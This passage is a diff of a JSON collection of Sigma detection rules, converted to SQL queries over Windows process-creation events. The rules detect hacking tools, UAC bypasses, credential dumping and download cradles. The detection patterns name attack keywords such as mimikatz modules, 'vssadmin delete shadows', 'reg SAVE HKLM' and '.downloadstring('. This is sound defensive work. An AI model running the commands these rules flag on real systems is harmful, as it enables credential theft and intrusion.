the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate administrative use" + "Programs that use the same command line flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": "727454c0-d851-48b0-8b89-385611ab0704", + "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "status": "test", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Legitimate use" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "author": "Sreeman", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", - "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "status": "experimental", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate activity is expected since extracting files with a password can be common in some environement." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + }, + { + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth 